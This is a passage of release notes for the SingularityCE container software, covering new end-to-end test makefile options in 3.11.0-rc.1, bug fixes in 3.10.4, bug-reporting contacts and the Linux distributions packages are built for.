• The e2e-test makefile target now accepts an argument E2E_GROUPS to only run specified groups of end to end tests. E.g. make -C builddir e2e-test E2E_GROUPS=VERSION,HELP will run end to end tests in the VERSION and HELP groups only.
• The e2e-test makefile target now accepts an argument E2E_TESTS which is a regular expression specifying the names of (top level) end to end tests that should be run. E.g. make -C builddir e2e-test E2E_TESTS=^semantic will only run end to end tests with a name that begins with semantic. These E2E_ variables offer an alternative to the -run flag, which may be easier to use given the structure of e2e tests.

Thanks / Reporting Bugs

Thanks to our contributors for code, feedback and, testing efforts!

As always, please report any bugs to: https://github.com/sylabs/singularity/issues/new

If you think that you've discovered a security vulnerability please report it to: security@sylabs.io

Have fun!

Downloads

Source Code

Please use the singularity-ce-3.11.0-rc.1.tar.gz download below to obtain and install SingularityCE 3.11.0-rc.1. The GitHub auto-generated 'Source Code' downloads do not include required dependencies etc.

Packages

RPM / DEB packages are provided for:

• Ubuntu 18.04 (bionic)
• Ubuntu 20.04 (focal)
• Ubuntu 22.04 (jammy)
• RHEL/CentOS 7 (el7)
• RHEL/CentOS/AlmaLinux/Rocky 8 (el8)
• RHEL/CentOS/AlmaLinux/Rocky 9 (el9)

These packages were built with Go 1.19.3

SingularityCE 3.10.4

SingularityCE 3.10.4 is a bugfix release in the 3.10 series.

Bug Fixes

• Ensure make dist doesn't include conmon binary or intermediate files.
• Do not hang on pull from http(s) source that doesn't provide a content-length.
• Avoid hang on fakeroot cleanup under high load seen on some
  distributions / kernels.

Thanks / Reporting Bugs

Thanks to our contributors for code, feedback and, testing efforts!

As always, please report any bugs to: https://github.com/sylabs/singularity/issues/new

If you think that you've discovered a security vulnerability please report it to: security@sylabs.io

Have fun!

Downloads

Source Code

Please use the singularity-ce-3.10.4.tar.gz download below to obtain and install SingularityCE 3.10.4. The GitHub auto-generated 'Source Code' downloads do not include required dependencies etc.

Packages

RPM / DEB packages are provided for:

• Ubuntu 18.04 (bionic)
• Ubuntu 20.04 (focal)
• Ubuntu 22.04 (jammy)
• RHEL/CentOS 7 (el7)
• RHEL/CentOS/AlmaLinux/Rocky 8 (el8)
• RHEL/CentOS/AlmaLinux/Rocky 9 (el9)

These packages were built with Go 1.19.3